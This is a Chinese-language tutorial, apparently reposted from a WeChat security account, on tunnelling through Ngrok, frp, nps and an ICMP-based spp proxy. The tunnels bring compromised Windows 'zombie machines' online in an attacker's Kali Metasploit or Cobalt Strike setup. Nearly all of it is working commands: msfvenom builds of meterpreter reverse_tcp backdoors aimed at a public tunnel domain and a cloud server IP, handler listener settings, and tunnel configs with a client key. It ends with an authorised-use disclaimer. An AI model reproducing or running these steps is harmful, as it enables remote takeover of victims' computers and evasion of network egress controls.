内网安全-隧道&内网穿透上线

内网主机通过隧道与外网主机建立连接，隧道通过配置可以将访问外网主机的流量转发给内网主机，从而实现本地Kali虚拟机控制别人电脑上线

Ngrok注册登录：https://www.ngrok.cc
frp下载：https://github.com/fatedier/frp
nps下载：https://github.com/ehang-io/nps

spp下载：https://github.com/esrrhs/spp
EW：http://www.rootkiter.com/EarthWorm

（1)购买免费隧道，配置隧道：https://www.ngrok.cc

选择tcp协议，将访问外网域名10039端口的流量转发到内网主机Kali的2233端口

（2)Ngrok客户端(sunny文件)下载，Kali运行Ngrok客户端，通过免费隧道与Ngrok服务端建立连接

./sunny clientid 202608291918 //最后参数为隧道id

（3) Kali-MSF生成到外网域名和端口的后门，监听本地2233端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10039 -f exe -o tcp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 2233
run

• 1
• 2
• 3
• 4
• 5
• 6

监听原因：因为后门流量给到外网主机，然后会通过隧道配置转发至Kali虚拟机2233端口

(4)肉机运行后门tcp.exe，直接上线到Kali虚拟机

(1) 同上，换了个步骤，就是自己在阿里云服务器上下载Frp并启动Frp服务端

服务器修改配置文件frps.ini：

[common]

bind_port = 7000

启动服务端：./frps -c ./frps.ini

(2) 本地攻击机Kali下载客户端Frp，启动客户端与阿里云服务器建立隧道连接，相关配置

客户端修改配置文件frpc.ini：

[common]

server_addr = 47.94.236.117

server_port = 7000 #frpc工作端口，必须和上面frps保持一致

[msf]

type = tcp

local_ip = 127.0.0.1

local_port = 5555 #转发给本机的5555

remote_port = 6000 #服务端用6000端口转发给本机

启动客户端：

./frpc -c ./frpc.ini

(3) Kali-MSF生成到阿里云服务器ip和6000端口的后门，监听本地5555端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6000
-f exe -o frp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 5555

run

(4) 肉机执行木马frp.exe上线

阿里云-服务端：
(1)、启动
./nps install
./nps
访问管理端：http://IP:8080/admin/123
(2)、创建客户端，生成密匙
(3)、添加协议隧道，绑定指向
远程绑定5555,指向本地6666
攻击机Kali-客户端：
(1)、连接服务端：
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v
(2)、生成后门：
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555
-f exe -o nps.exe
(3)、监听后门：
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
(4)肉机执行后门nps.exe上线

https://github.com/esrrhs/spp
支持的协议：tcp、udp、udp、icmp、http、kcp、quic
支持的类型：正向代理、反向代理、socks5正向代理、socks5反向代理
在对抗项目中有遇到过一些极端环境，比如目标封了tcp，http等常用出网的协议，
但是icmp，dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

(1)、攻击机服务端：阿里云服务器监听本地的icmp数据
./spp -type server -proto ricmp -listen 0.0.0.0
(2)、肉机客户端：将本地的8082给到攻击机服务器的8081上（TCP封装icmp）
spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :8082
-toaddr :8081 -proxyproto tcp -proto ricmp
(3)、CS
监听器1：http 47.94.236.117 8081
监听器2：http 127.0.0.1 8082
生成后门：用监听器2，后门流量给到本地8082，spp隧道会封装成ICMP转发给服务器的8081端口，所以监听器1会上线

(4)、肉机执行木马上线

用内网穿透-隧道，可以实现本地启动的web项目被任何人访问，没有服务器搭建网站可以这样玩

公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用，公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击，公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流，不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。

原文始发于微信公众号（TKing的安全圈）：内网安全-隧道&内网穿透上线